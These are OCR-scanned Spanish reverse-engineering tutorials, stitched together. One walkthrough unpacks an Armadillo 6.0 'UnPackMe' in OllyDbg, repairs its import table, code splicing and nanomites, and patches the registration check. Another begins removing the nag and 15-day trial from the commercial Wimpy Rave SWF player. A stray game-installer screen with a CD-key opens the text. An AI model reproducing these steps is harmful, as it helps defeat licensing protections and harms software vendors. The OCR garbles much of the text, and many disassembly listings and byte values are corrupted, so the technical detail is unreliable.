biohazard 4 - InstallShield Wizard 


biohazard 4 - InstallShield Wizard 


Enter CD-Key 
Validate CD-Key 


Choose Destination Location 
Select folder where setup will install files. 


Enter CD-Key Setup will install biohazard 4 in the following folder. 
To install to this folder, click Next. To install to a different folder, click Browse and select 
another folder. 


bh82220691111115 


Destination Folder 


C:Márchivos de programatCAPCOMbiohazard 4 [ Browse... ] 


[ <Bock [New ) [Conca <Beek J[ New» ] [_ Cocal_] 


Nos deja pasar también. 


Bueno, espero que le saquéis partido a este tutorial; yo por lo menos he 
aprendido mucho escribiendolo. Un saludo a todos mis amigos. 


Este tutorial está dedicado a mi amigo astronado por animarme a escribirlo. 


noukeys 2008 


1 Setiembre de 2008 


Unpackme_Armadillo 6.0.0 
Simula la presentación de La Guerra de las Galaxias 
Armadillo 6 


Debo decir que para seguir este tutorial,si se es newbie, primero es necesario leer los tutes de 
Ricardo y de+ NCR porlo menos. Para los demás, perdón pero no hay nada nuevo. 
Como lo resolví de la forma larga, sólo explicare al comienzo los pasos casi sin detalles, por 2 motivos, 
1) para que explicar lo que ya está hecho magistralmente en tutes anteriores 
2) no tengo ni idea como explicar lo q no entiendo (jeje la fundamental), y se haría muyyyy largo. 
Así que comienzo... 


en 15) || Primer herramienta que utilizo es el Arma Find Protect (imagen 1), 
———————| como el nombre lo indica, sabré que protecciones tiene. Debug - 

e is | Blocker / Copymen ll etc.. Con esa va voy muerto así que a leer todo 

¡Debug-Blocker . 

CopyMem-11 sobre armadillo. 


Enable Import Table Elimination 

Enable Strategic Code Splicing 

Enable Nanomites Processing 

Enable Memory-Patching Protections — 
l- <Backup Key Options” 

Variable Backup Keys I 

l- «Compression Options> 


[e] CPU - main thread, module UnPackMe 

00447000 $ 

1 ES. 00000000 
y 


0000-0000 Hvwid changer Detach OnTop 


ready Lise] 


imagen 1 sde 


Como ya dormí un poco el burro que llevo dentro, diré los pasos que fuí realizando para poder separar 
los dos procesos que se crean. De más está decir que con el Arminline sería mucho más fácil y rápida 
esta parte, pero no es bueno para aprender a sacar este packer. 

Cargo el programa en olly y después de los mensajes ya estoy en el EP 

He WaitForDebugEvent y F9 (imagen 2) 


6012DD8 0 MS 


di LHAl 


imagen 2 


Hay que anotar del Stack desde donde es llamada, en mi caso 0042E722 y seguir en el dump 
0012ECB4 


96 60 60 60 60 60 60 B0|.......- 
808 68 608 608 60 BB BB BB|.......- 
:188 06 29 60 00 00 00 00/NM)..... 
CB 68 68 608 60 60 60 BAJE.......- 
88 608 60 68 78 01 29 B0/....xM). 
58 06 600 08 00 00 00 BO|XH...... 


Borrar el He y colocar uno nuevo en He WriteProcessMemory y F9 Sale el siguiente mensaje (imagen 3) 
ER 3 Kó __C——c—c—c_—_—_——c—o—o o — o op O A AAAAÁAÁAAÁKÁKÁA A — 
Reminder 


j 


This program is notfree. ltis an evaluation version of copyrighted software. Ifyou use it beyond the evaluation period, you 
are expected to register it with the author. Please checkthe prograrn's documentation for details. 


8012DCF8 


imagen 4 
Acepto y se detiene en el hbp, aquí lo importante es Address (inicio dirección del hijo"base”) = 402000 y 
Buffer (direccion de bytes guardados) = 01275C88(imagen 4) Mirando en el dump la dirección del 
reporte de Wait... están los datos para usar más adelante (imagen 5) 


Address 


8 
5 
0060 00 00 00 09 00 90 -...... 
imagen 5 4% 20 40 00 92 90 09 00 /=-Q.E..ls 
99 66 00 98 HA 2D 4098 a 
AR 20 19 00 58 4D DC B9|-G.xmMi: 


90 00 00 08 18 D6 99 00/....EN.. 
B9 66 08 08 60 08 BB BA|........ 
13 00 00 00 F1 2A AE 00/M.. -ÑxN. 


Para poder atacar el segundo proceso hay que hacerle un loop con la siguiente cuenta: 
OEP - BASE = OFFSET (402DA4 - 402000) = Da4 A 
OFFSET +BUFFER = DA4 + 01275C88  = 1276A2C (dirección loop) 
En el Dump Ctrl + G 1276A2C y reemplazo los bytes 55 8B por EBFE 53 56 57 89 65 ES 33 DB pa 
Con eso ahora voy a la ventana principal y Crtl + G 0042E722 (desde donde era llamada Wait...) F2 
imagen 6 

[€] CPU- main thread, module UnPackMe 


ALL NEAR DWORD PTR DS:[<A4KERNEL32.Wait 
8500 TEST EAX,EAX 
y BF84 38200000 


OFB645 D3 MOUZX EAX,BYTE PTR SS:[EBP-2D] 
8508 TEST EAX.EAX 
imagen 6 
Ctrl + F9 y F8 


Crtl + F9 y F8 La llamada anterior es la encargada de arreglar el código (00430C70), Enter sobre el 
call y click derecho en el primer Push EBP > Find References to > Selected Command 


8B45 BC MOU EAX,DWORD PTR SS:[EBP+C] 

58 PUSH EAX 

8B4D 88 HOU ECX,DWORD PTR SS:[EBP+8] 

51 PUSH ECX 
: | 'ALL UnPackhe . 9943 9FCO 

ADD ESP,8c 


E 8075 8304 ec | 


BFB6DO HOUZX EDX,AL 

85D2 TEST EDX,EDX 
v 75 87 

3200 NOR AL,AL 


En la ventana que aparece se ve claramente la call que arregla y la otra es la que nos perjudica (solo hay 
que nopear) doble click sobre la segunda call (imagen 7) y ya estamos donde remplazamos por 90 ,obvio 
que en cada máquina estas direcciones pueden variar. 


[r] References in UnPackMe:.zkjfwto 00430FC0 


Address |Disassembly Comment 

AA AN UBEE UnPackhe . 00430FC0 [¡SEERESERAA 
00430F3B|CALL UnPackhe . 6043 8FC68 ¡nopear 

00430FCO| PUSH EBP Ñ ¡(Initial CPU selection) 


| imagen 7 | 


[€] CPU- main thread, module UnPackMe 


8B048A HOU EAX,DWORD PTR DS:[EDX+ECXx<»4] 
58 PUSH EAX 


90 NOP 

NOP 

NOP 

NOP ls 
ADD ESP, BC 
PUSH EAX 


NAT FAY 


F9 y se detiene en el bp de Wait... si miramos unas líneas hacia arriba el código esta ofuscado(enojado 
por meternos jeje) (imagen 8) 


AB 336168E8 HOU AL,BYTE PTR DS:[E8686133] 
9300 ADD EAX,DWORD PTR DS:[EAX 
6808B 95B9FS5FF [ADD BYTE PTR DS:[EBX+FFF5B695],CL 
'ALL NEAR DWORD PTR DS:[EDX-1. 


85C8 TEST EAX,EAX 


. BFSA 38200000 |JE UnPackMe 00430768 


imagen 8 
FSTP TBYTE PTR DS:[EDX-18] 
NOP 
NOP 
NOP 


DB7A FB 


£R95 RAFSFFFL> MANU FDX-DUNRD PTR SS:TFRP-A541 


imagen 9 


Hay que realizar algunos cambios, básicamente reemplazo A03361 por 909090 y E803 por 0000 
(imagen 9) , en 42E728 cambio Test eax,eax por Jmp 401000 y selecciono nuevamente los 909090 y 
les realizo un undo selection. Por fin voy a 401000 y hago un injerto, usando los valores de la imagen5 
00401000  C705 54ED1200 0>MOV DWORD PTR DS:[12ECB4],1 

0040100A C705 58ED1200 B>MOV DWORD PTR DS:[12ECB8],8B8 

00401014 C705 5CED1200 B>MOV DWORD PTR DS:[12ECBC],0E24 

0040101E C705 60ED1200 0>MOV DWORD PTR DS:[12ECC0],80000001 

00401028 C705 64ED1200 0>MOV DWORD PTR DS:[12ECC4],0 

00401032 C705 68ED1200 0>MOV DWORD PTR DS:[12ECC8],0 

0040103C 8105 6CED1200 0>ADD DWORD PTR DS:[12ECCC],1000 

00401046 8105 78ED1200 0>ADD DWORD PTR DS:[12ECD8],1000 

00401050 8105 7CED1200 0>ADD DWORD PTR DS:[12ECDC],1000 

0040105A 813D 7CED1200 0>CMP DWORD PTR DS:[12ECDC],UnPackMe.00402000> inicio (address) 

00401064 * 74 D6 JE SHORT UnPackMe.0040103C 

00401066 813D 7CED1200 0>CMP DWORD PTR DS:[12ECDC],UnPackMe.00404000> 

00401070 - 0F85 F8DF0800 JNZ UnPackMe.0042E730 


00401076 90 NOP 
00401077 90 NOP 
00401078 90 NOP 


00401079 90 NOP 


Coloco un bp en el primer nop y ojo!!!! es fundamental no olvidarse de cambiar en el reporte de Wait... 
tres direcciones 12ECCC, 12ECD8 y 12ECD, que tienen 402DA4 (oep) por 400000 antes de darle al 
F9. Se detiene en el bp y cambio el nop por Push 0BO0 (el pid del 2 proceso), el siguiente nop lo cambio 


ya puedo atacar este proceso en otro olly. 


imagen 10 
Registers (FPU) 4 Registers (FPU) < < 
00000000 B0B000B0A 
9012DCEL> 88120D6l> 
7C091EB94 
9012DD8€ 0012DD8€ 


El proceso que ataque está detenido en un retn, F8 y Ctrl + F9 y ya está en el oep que es 00402DA4, 
claro que allí ahora está el loop, así que cambio EBFE por 558B que son los Bytes originales. Unas 
líneas más abajo está la primer llamada a una api y la dirección está fuera del ejecutable asi que... 
(imagen 11) 


HOU DWORD PTR SS:[EBP-18],ESP 
XOR EBX,EBX 

HOU DWORD PTR SS:[EBP-4],EBX 

PUSH 2 

CALL NEAR DWORD PTR NS-T14F1F481 

59 POP ECX Backup » 
830D 50634000 [OR DWORD PTR DS:[486; Copy > 
830D 546340980 JOR DWORD PTR DS:[406; 


Binar » 
FF15 CC1C6EG1 [CALL NEAR DWORD PTRI—, E á _fmode 
8B0D 44634900 |MOU ECX,DWORD PTR DS “2 U0S a 
8908 MOU DWORD PTR DS:[EA; Label 
FF15 281F6E01 [CALL NEAR DWORD PTR 1 Comment ; _commode 
8B0D 40634000 |MOU ECX,DWORD PTR DS  Ereakpoint » 
8908 MOV DWORD PTR DS:[ERi Run trace R 
A1 3C1D6E91 [MOV EAX,DWORD PTR DS 
8B00 HOU EAX,DWORD PTR DS Follow Enter 
AS 40634888 [MOV DWORD PTR DS:[48 new origin here Ctrl+Gray * 
ES 16010008 [CALL UnPackhe.B9482F: ¿ 
391D 68624909 |CMP DWORD PTR DS:[484 
v 75 BE Thread » 
68 262F4000 [PUSH UnPackMe.09402F: AOS Selection 


FF15 681C6E91 |CALL NEAR DWORD PTR 1 Memory address 
59 POP ECX Search for » 
E8 E8S000000 CALL UnPackhHe.894082F- — Find references to » 
68 141604000 PUSH UnPackHe.B0B94060- — view » 


imagen 11 


En el Dump con la vista en Long Address busco el inicio y final de la ¡at, comienza en 01AE1A68 
77F1AD80 GDI32.CreateFontA y termina en 01AE1F64 77BD18BA VERSION.VerQueryValueA este 
es el momento de realizar unos sencillos pasos para obtener una ¡at correcta y ponerla en lugar de la 
que tenemos. Ya falta menos jeje. Vamos por ello... 

Para agilizar el proceso utilizo el ArmaDetach selecciono Debug Blocker y y arrastro el unpac, al cabo 
de unos segundos ya está la tarea realizada. (imagen 12) 


He Arnadillo 6.0.0 
¿[000003481 


tion detected 


imagen 12 


tion enabled 
ssing enabled 
s iz [00000918] 
[004470001 
[60800001] T 
sfullu :) 
o Debug-Blocker Debug-Blocker IAT resolve 
CopuHen-11 A FE 


A decir verdad desde aquí probé poniendo he en VirtualProtect y al salir de donde era llamada buscar 
el primer push 100, pero no me funcionó... da un error de protección y a llorar al campito!!!! 

Después de renegar (por lo inútil) encontré los pasos a seguir... he CreateFileMappingA y cuando se 
detiene buscar en el Memory map 55 8B EC 83 EC 2C 83 3D (imagen 13) 


[a] Dump - 01680000..017 18FFF 
|81682600|5K £R FF 22 FR 2 22 3D 28 E6 6F 01 00 75 59 C7 
016826D0|1 Backup > 80 01 00 00 ES A6 85 605 80 
816826EB0/€ Copy » 45 E4 A3 28 E6 Ó6F 01 8B 0D 
016826592 einary cs Y 2 a 
01682700|€ 00 00 
6 Breakpoint » Memory, on access 55 FA 
>al$ Search for » Memory, on write 8B 4D 
38/F Goto address Ctri+G 55 FC 
01692740|€ Hardware, on access » 8B 45 
01682750 | Y Hex > Hardware, on write * 83 01 
016827681 Text » Hardware, Gu.execution 45 Fx 
616822778|06 Short > EB UB 8B ls F4 83 UZ 01 89: 


Quito el he de CreateFile... y F9... se detiene en 


[] CPU - main thread 


016826C0 : P 
8BEC MOUSEBP ,ESP 
83EC 20 SUB ESP,20 


833D 20E66F01 (CHMP DWORD PTR DS:[16FE628],8 

75 59 

C745 EC 2EB0753M0U DWORD PTR SS:[EBP-14],2075B02E 
68 000100008 PUSH 108 


La primera vez cambié el 55 por C3 y después de unas ejecuciones otra vez un error!!! Ok antes de 
rendirme hice todo de nuevo y cuando llegue acá no cambié nada deje el he y seguí con F9, en el 


Stack se ve cosas interesantes 
00128F24 


00128F24 


00128F24 


En resumidas cuentas, NO HAY QUE CAMBIAR NADA hasta que salga el mensaje recordatorio. Antes 
de darle al OK cambio el 55 por C3 y quito el único he que tenía puesto. 


ART NT VU3DUYUY| VUVUT UU Pr1u| KYWE | RWE 
2 Debugging options 2%] |eesE0000| 00001999 Priv/RUE—— RUE 
: A : : ss B03F 0088 000010800 Priv|RUE RUE 
E ds | D CPU | Regist Stack | Analysis 1 | Analysis 2 | Analysis 3 | 
id] Ml in y | eri É | ts | Sa dc 99499888 | 99991998 | UnPackhe. PE header |Imag R RUE 
Ñ ecurity | ebug | wents face | nn gs esses 80401000 9809803008 UnP--""- 1 » VES 4 O A RUE | 
+ e 99404009 eesez000 | unf  Actualze RUE 
[4 Ignore memory access violations in KERNEL32 98949869909 0909919998 UnF  Dump in CPU RUE 
Ignore (pass to program) following exceptions: 00407608| 09948908 UnF  Dump RUE 
ob 00447000| 00010099 UnF search Ctrl+B RUE 
a Pa 09457998 09020908 UnF coach next Ctrl RUE 
Single-step break be 00477000 00498898 UnF RUE 
[4 Memory access violation 09907000| 0046C809 UnF set break-on-access F2 RUE 
AN sion 00 80D89099 00906000 E RE 
ES neo E y ; ' B0E40090 00002000 Set memory breakpoint on access E RE 
Y Invalid or privileged instruction | Set memory breakpoint on write 103 
ÍV_ ANFPU exceptions Set access » 
[Y Ignore also following custom exceptions or ranges: Allocate Memory 
Free Memory 
00000000 .. FFFFFFFF 
Zero Memory 
Add range Dump Merory-Area 


E Load dumped memory 
Delete selection 


Set break-on-execute 


turn to 0164AA15E 
a] DK Undo Cancel Copy to clipboard » 


Utilicé el plugin Ollybone para llegar al oep y cuando se detiene en el oep 00402DA4 no hay nada 
entendible, por lo menos para mí! ¡pero sé (insisto en que hay que leer todos los tutes de la lista) que está 
bien y que ya puedo copiar la ¡at arreglada. 


[e] CPU - main thread, module UnPackMe 
00402DA4 


EX 39 IN AL 439 : 1/0 command 


C5C4 LDS EAY,ESP Illegal use of register 

87 POP ES Modification of segment register 
5D POP EBP 

E7 7B OUT 7B,EAX 1/0 command 

6F DOUTS DX,DWORD PTR ES:[EDI] 170 command 

BD 85142FD5 HOU EBP,D52F1485 

CB RETF Far return 

9A GFDSAF3B 3FÍCALL FAR B13F:3BAFDS56F Far call 

26:1E PUSH DS Superfluous prefix 

6F DUTS DX,DWORD PTR ES:[EDI] 170 command 

D5 AF AAD BAF 

3BEC CHMP EBP,ESP 

3907 CHP EDI,EAX 

68 3982265E PUSH 5E268239 

87E6 XCHG ESI,ESP 

74 B2 

3229 XOR CH,BYTE PTR DS:[ECX] 

0539 LDS EDI,FWORD PTR DS:[E€X] Modification of segment register 
98 NOP 

C073 26 D9 SAL BYTE PTR DS:[EBX+261.0D9 Shift constant out of ranae 1..31 


La busco y como sé donde comienza y donde termina, la selecciono y le hago binary copy 


| Enter binary string to search for [5] 


PEN TT EopzvzE5rmm 
UNICODE [————————— == 


HEX +04 po AD Fi 77 


¡0200 01CC| 
28/77 F14D80/6 
816AC5D8 
816AC665 
73DECBFA 
73D52415 


HFC42 .113738 
MFC4A2 4567 


T— Entire block 


<< | | 
Case sensitive Cancel 


ODODODO 


Cierro este trabajo y en el olly donde tengo el proceso separado y parado en el oep, selecciono la ¡at 
que recuerdo comienza en 01AE1AG68 y termina en 01AE1F64 y le hago binary paste. 


Address 


7C801EEE 
73D56BE1 
73D51265 
73DAED6? 
70884028 
B16AC679 
73DEC77C 
73D5DA75 
73D669%46 
81640712 
73DE067B 

73D55351 


kernel132.GetStartupInfoA 
HFCA42.12446 

HFC42.14079 

HFC42.13095 
kernel32.GetProcáÁddress 


Metu? 13619 


HNFC42.42124 
HFC42.42514 


Se ve en rojo los valores que fueron 
modificados. 


MFC42.H952 
HFC42.11648 


B16AC76D 
73D521C5 
77C0317AC 
'|73DADDF5 
77BD1A58 
73D5EA76 


HFC42.12379 
DFFSET msucrt._acmdln 
HFC42.44224 
VERSION.GetFileVersionInfoA 
HFC42.116172 


Utilicé el plugin Ollybone para llegar al oep y cuando se detiene en el oep 00402DA4 no hay nada 
entendible, por lo menos para mí! ¡pero sé (insisto en que hay que leer todos los tutes de la lista) que está 
bien y que ya puedo copiar la ¡at arreglada. 

Por fin voy por los últimos pasos. Busco el code splicing 


01EBD000/ 00001000 | ¡Priv RY- Gual Ru 
01EBE 000 | 00002000 ¡stack of thiPriv ¡Ry Gua Ru 
022E0000| 060002000 | Hap ¡R R 

03E50000 00011000 ¡Priv R E RUE 
10009000 99991998 RLeketDo ¡PE header Imag|R RWE 
10001900 099099909 RocketDo | .text ¡code Imag R RUE 
199940909 690909039899 RocketDo .rdata ¡imports,exptImag¡R RUE 
109000009 00902009 RocketDo .data ¡data Imag R RUE 
1000F000| 00001000' RocketDo| .rsrc ¡resources Imag R RUE 
4 ARAÑA ARANA! ARANOARA| Dantlinetñhia untar lunatTanatianeiTman!D DIE 


y arreglar todo lo que falta con el ArminLine 


a Arminline o 5 eb 


Archivo Opciones Ayuda 


1D del Proceso (hijo): Ox E 


(F5 para actualizar] 
ollvdbg.exe (46C] 


Procesos: Módulos: 


UnPackMe Smadillo £:.0:0:exe 


Inicio de la Sección Code: Ds [401000 a O 2 en Ep 
Longitud de la Sección Code: Ox [3000 ACDSeeQY10.exe [B70 L USER32. dll 
Es UnPackMe: Armadillo 5:00 exe f8B91 GDI32. dll 
Code Splicing HpiSnap5.exe [F90) uxtheme. dll 
ES 5 ; swchost.exe [F38 mswecrt. dll 
Inicio de la Sección ES: Ox [03850000 TOT Pros lo 84) ADVAPI32 dll 
Longitud de la Sección ES: Ox (00011000 vmnetdhcp.exe (608) APCRTA. dll 
vmnat exe at] an ' POROS dil 
AIM. DI ná aa ne ami 


bs Buscando Code Splicina... 


Code Splicing 
Proceso almacenado en el buffer correctamente, 

2 splices reparados. 

Reparando splices completamente. Parchando el proceso... 
Parche =$ 


Relocalizar la nueva ¡at 


2 splices reparados. 
Reparando splices completamente. Parchando el proceso... 
Parche realizado. 


Import Elimination 
Base de la l4T Existente: Ox (01 6e1468 


Long. de la 147 Existente: Ox [áte I 


Nueva Base (VA) de la 47: Ox [447000 


Cambiando la Base de la 147 
Imposible leer la 147 en memoria. 
No se puede cambiar de base la l4T, 


Cambiando la Base de la 14.1 
Proceso almacenado en el buffer correctamente. 
Un total de 200 calls a DLL's. 

Analizando... 

174 funciones API provenientes de 8 DLL's. 
Redireccionando referencias a DLL's: 

Un total de 200 calls redireccionadas. 
Parchando el proceso... 

Proceso parchado exitosamente. 


Nanomites 


Paso 1: Localizar + Analizar Localizar 
Paso 2: Remover 
Cargar 


Los valores que cambié son la ubicación 
de la ¡at existente por un nuevo lugar 
dentro del ejecutable y que esté en la 
sección de armadillo. Ahora se ve a partir 
del oep los saltos dentro del ejecutable, 
por las dudas reviso los FF25 y los FF15 
y están todos bien. Así que ahora solo 
resta dumpear. 


Localizar Manualmente 
TP Editar línea de comand. 


y D 
00402DA4 


PUSH EBP 
NOU EBP,ESP 
U 


ISH -1 


68 88484000 
68 282F4000 
64:41 00000000 


PUSH UnPacktle . 60404888 
PUSH UnPackhe . 80402F2A 
MOU EAX,DWORD PTR FS:[86] 


JMP to msucrt._except_handler3 


50 PUSH EAX 
64:8925 8808801 MOU DWORD PTR FS:[6],ESP 
EC 68 SP,68 


Hou De PTR SS:[EBP-18],ESP 
XOR EBX,EBX 
pda DWORD PTR SS:[EBP-4],EBX 
6A 02 H 2 

FF15 18724400 cate AR DWORD PTR DS:[447218] msucrt.  set_app_type 
830D 50634000 
830D 54634000 
F15 00724400 
8B0D 44634000 
8908 


061 DWORD PTR DS:[406350],FFFFFFFF 
OR DWORD PTR DS:[406354] ,FFFFFFFF 
CALL NEAR DWORD PTR DS:[447200] 
MOU ECX,DWORD PTR DS: od 

HOU DWORD PTR DS:[ER' 

CALL NEAR DWORD PTR DS ea 
MOU ECX,DWORD PTR DS:[486348] 

MOU DWORD PTR DS:[EAX],ECX 

MOU EAX,DWORD PTR DS: [4a7248] 

MOU EAX.DWORD PTR DS:[EAX1 


msucrt._ p_ fmode 


FFAS FC714480 
8B0D 40634008 


msucrt._ p__commode 


8908 
A1 48724400 
8B00 


Dumpeeo con el ollydump y en el Import Reconstructor busco el proceso, coloco el oep la dirección de la ¡at > 
AutoSearch y Get Imports y Fix Dump... 
Listo programa sin el armadillo 


£ Import REConstructor v1.7 Final - MackTiuCF o | 5 aia] 


Áálttach to an Active Process 


[e:temptarmadillo 6.0.OMunpackme_armadillo 6.0.0.exe (DOOOO8B8] _ PickDLL | 


Show Irralid Options 
Show Suspect | _ Clearlog | 


Auto Trace | About 
Clear Import | Exit 


147 Infos Needed 


DEP | 
pea _AutoSesich | earch 
RAYA, (00047000 


Size [0OO0O2D8 


Imported Functions Found 


mfc42.dll FThunk:00047000 NbFunc: 77 [decimal:119] valid: YES 
sinmam. dll FThunk:000471E0 NbFunc:1 (decimal: 1] valid:YES 
version. dll FThunk:000471E£8 NbFunc:3 (decimal: 3] valid: YES 
mswert.dll FThunk:000471F8 NbFunc:15 [decimal:21] valid: YES 
user32.dll FThunk:00047250 NbFunc:D (decimal: 13] valid:YE 
adi32.dll FThunk:00047288 NbFunc:8 [decimal:8] valid:YES 
kemel32.dll FThunk:00047240C NbFunc:8 [decimal:8] valid: YES 
ntdll. dll FThunk:000472D0 NbFunc:1 [decimal 1] valid: YES 


E AAA AAA 


Ahora hay que arreglar el tema de los nanomites, otra vez el ArmInLine 


Hecho [1 posibles páginas encontradas]. Escaneando... 


Import Eliminatior ed 
3 No presenta Code Splicing. 


Base de la l4T Existente: Ox [447000 
Long. de lal4T Existente: Ox (21 2 
Nueva Base (V4)] de la l4T: Ox [407000 


Cambiar Base 


Nanomites 


Paso 1: Localizar + Analizar Li 
Paso 2: Remover 


Reparar Dump 


Guard. | Cargar 


Localizar Manualmente 
Editar línea de comand. 


" ERROR! 


y Armadillo not detected! 


Localizando la 147... 
LaláT no ha podido ser localizada. Las secciones .text o data podrían estar er 


aan Nanomites ------ 

Proceso almacenado en el buffer correctamente.. 
Intentando usar automáticamente nombre de archivo... 
Inicializando... 

183 posibles INT3 encontrados. 

166 useless Nanomites discarded. 

183 INT Dyeontrados. 17 exitosamente analizados. 


Cargo el dump en el olly F9 y cuando está el msj F12 


Il USER32.MessageBoxTimeoutA USER32.77D50593 BB12EDAS 
BB12EDCC! 77D50 559| > USERS2, MessageBorExA USER32.77D5054B 0012EDC3 
0012EDD9| 60009990 hOwner NULL 

0012EDD4¡ 004B69AC| — Teut = = "Armadillo not detectedt” 

9012003! 00406804 ' Title = "ERROR* 

B012EDDC! 90090918 Style = MB_0K; ame ICONHAND MB_APPL 

9012EDEO' 00000000; -—Lanousoc Ii -= B (LANG_NEUTRALI 

OOIPEDES DO4DIS2A * USERS. MessageBorA ¡Armadi|l.0B401524 | DO12EDE4 
0012EDEC| 00000000! ñ r = NULL 

BB12€E0FO) B44B6BAC' e = "Armadillo not detectedt” 

0B12EDF4| BO4060C4: ile = "ERROR*” 

0B12EDFS/000BAB1a!  otuls MB_OK;MB_ ICONHAND ; MB, _APPLÍ 

OB12F204| DABLE: > Armadillo BB4614C0 ¡Armadill.0040169A 


Doble click sobre la primer llamada 


Doble click sobre la primer llamada 


- 8508 TEST EAX,EAX 

e DUTE 
6Nn 18 PUSH 18 MB_0K/|MB_ICONHAND | MB_APPLHOL 
68 C4604000 |PUSH Armadill.004068C4 "ERROR" 
68 AC6B4BBB [PUSH Armadill. 00406 0AC "Armadillo not detectedt" 


PUSH EAX 
O 
POP EDI 

NOR AL,AL 

POP ESI 

81C4 80040001 ADD ESP ,4008 

c3 RETN 

LEA ECX,DWORD PTR SS:[ESP+188] 

PUSH BFF 

PUSH ECX 

PUSH Armadill. 9940694 ASCII "USERKEY" 
CALL NEAR ESI 


8D8C24 08018 
68 FF000000 
51 

68 A4694000 
FFDÓ 


85C8 TEST EAX,EAX 
y 1D 
. BF 9C694098 |M0U EDI,Armadill.0040689C ASCII "No keyt” 
- 8309 FF OR ECX,FFFFFFFF 
2 RIAAE: RFPNF SFAS RYTF PTR FS-I1FDT1 


Ni dudo y cambio el JNZ por JMP, me llama la atención las cadena USERKEY y No Key Guardo la 
modificación y ejecuto el nuevo archivo 


Information léósl | ese No Key lo veo conocido jeje. Ni lerdo ni perezoso cargo de 
5 el archivo y modifico la cadena por tincopasan, hay que tener 
Y Program is registered to (No key!). | cuidado de respetar que al final del nombre debe ir un 
punto(00)" ." 


Guardo los cambios y siiiii chau armadillo y key 


Address 


HE 6 O 6É key? .USERKEY. 
41 72 6D 61 64 69 6€C 6C ÓF 28 6E 6F 74 28 64 65 Armadillw not de 
74 65 63 74 65 64 21 00 45 52 52 4F 52 21 M8 808/tected?.ERROR?.. 
41 AC 54 55 53 45 52 ME 41 AD 45 00 49 6É 73 74/| ALTUSERNAME . Inst 


TEST EAX,EAX 


APURO OU 1) Armad 
OR ECX,FFFFFFFF 

REPNE SCAS BYTE PTR ES:[EDI] 
NOT ECX 


cub Ent cov 


=== 
Information ==) 


” 
de 
y) Program is registered to. (fincopasan). y 
SS e e 
ax 


Como dije nada nuevo, pero sirve para que los newbies no tengamos tanto miedo de los armadillos 

Saludos a toda la lista, a Solid por alentarme siempre y a Blasito, porque el primer tute que lei fue el 

suyo sobre winzip. Si ahora molesto en la lista es por ese primer tute que leí. El es el culpable jejej 
E 


tincopasan(ODhotmail.com 


Crackeando aplicaciones SWF “Wimpy RAVe 2.0.7” 


Cracking Files *.SWF 


Programa: Wimpy Rave ver. 2.0.7 


Tutorial :TKO0001 


Protección: COMPRESION, NAG y TRIAL 15 días de ficheros FLASH (*.SWEP). 


1. Reconocer un *.swf esta comprimido, versión de flash 
2. Descomprimir manualmente un *.swf 

3. Quitar la molesta nag “mensaje DEMO” y “EXPIRED” 
4. Quitar el periodo de prueba 


Aplicación para páginas Web que reproduce: 
Don: Audio (MP3, AAC, M4A) 
PCIOn: Video (FLV, MPEG-4, MP4, SWF, 3GP) 
Con soporte automático, XML, XSPF, RSS, M3U, PLS y playlist basados en texto. 


CET 
| Download: — | htip:/www.wimpyplayer.com/ | http: http://www. wimpyplayer.com/ wimpyplayer.com/ 


Webserver con soporte php (apache, 1S..etc) 
a Sothink SWF Decompiler 
3. Hex Work Shop 
4. ActivePython 2.6 (http://www. activestate.com/solutions/python/) 


Herramientas: 


El trato de files del tipo swf es lago similar a los ya exe conocidos. 

Wimpy rave es algo especial, muchos dirian ah puedo usar un descompresor y con un 
decompilador lo paso de *.swf a *.fla y ahí modifico, pero hay algo muy especial en esta 
aplicación que al realizar dicha operación, se pierde data. 


Además ni que hablar del script que al principio me perdí y no entendía lo que significaba. 


Muglidark — http://www.tknotas.ath.cx 1 


Crackeando aplicaciones SWF “Wimpy RAVe 2.0.7” 
Debido a la diferencia de scripts, que les muestro a continuación. 


Script *.SWF cualquiera Script *.SWF aplicaciones wimpy 
de luner. sul > Action 10) > rave2_d_fswf > Action [86] > 


'/ [Action in Frame 2] 7 Action script... 
function loadSongs([) Í 
song0bj = new LoadYars(); 
song0bj.onload = parseñongs; 
song0bj.load("http://1.. 
) /7 End of the function 
function parsesongs (success) ( 
if (success) Í 
_root.song_list fld.text = ""; 
_root.albun_ list fld.text = ""; 
for (i= 1; 1 <4 song0bj.cnt; +) ( 
_toot.song_list = root.song_list + ("<a ¿7 [onClipEvent of sprite 326 in frame 21] 
_root.album_list = _root.album list + (": onClipEvent (load) ( 
VE end nf for 3f ILRNSÉRA?E =- ECSMRFAROI21 


” 


f? [onClipEvent of sprite 78 
onClipEvent (load) f 
if (5080866425 =7 580866823) ( 
if (!(1651270563 * 1651270563)) ( 
UL.UL(UL); 
y /7 end if 
7 end 1f 


in frame 3] 


0 0 3 MM NM Ha 0 mn — 


Script entendible Script Confuso 


Iniciando con la victima en cuestión. 


Esta es la presentación de nuestra victima. 


A () http: /fwwww,Eknotas.ath.cxf LO () 


[CS5* E] Forms” 2 Images” (6) Information” Miscellaneous” e Outline” 74 Resize” FP Tools" La] View Source” 2 Options" 


glidarkWgma.... E Radio OnLine - tknotas.ath.cx E 
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Crackeando aplicaciones SWF “Wimpy RAVe 2.0.7” 
1. Reconocer un *.swf comprimido, versión de flash 


Ahí se muestra nuestra victima. 


Dirección li, 


rave.ph 


Abrimos rave.swf en nuestro editor hex, y nos fijamos en los primeros 8 bytes del fichero. 


3 bytes 
4357 53 --> Comprimido con entrada "CWS" 
46 57 53 --> Descomprimido con entrada "FWS" 


1 byte 
Indica la version de flash con la que fue creado. 
para este caso "FLASH B" 


4 bytes 
Indican el tamaño del fichero. 
5E 40 04 00 


rave.swÉ | 


Offset 0 1219 4 516 £ 8 91011 12 139 14 15 


voo0000 (43 57 s3jloellsÉ 40 04 00) 78 9C EC BD 09 58 94 55 a a 
00000016 |1B 3F 7C CF 30 C3 0C AB EC 23 02 84 A0 A2 88 20 | .?]10X.«ift.I ol. : 
00000032 82 82 02 8A A2 22 8A 80 80 62 6E AC C3 A2 CO 10 | 11.10"Ilibn-AdcA.  : 
00000048 |0C B8 ES EB 54 5A 68 86 BD 2D 94 99 65 9A 95 B6 |. ,á8TZhIM-1MeniT ! 
00000064 69 BD 6A AS E6 52 DA 6E 64 B9 94 69 B6 BA 94 5B| iMj*eRÚnj*1iM21[ 


2. Descomprimir manualmente un *.swf 
Seleccionar desde x08 hasta el final. 


rave2_d.swwf | rave.swf  [ave.swf | 


La ds +de 2 3d sde ¿5 26: ¿7 A ds 91 ES a E Bs de E E 


00000600 |43 57 53 08 SE 40 04 00 78 9C EC BD 09 58 94 55 | CUS.70. .=1i%.XJU 
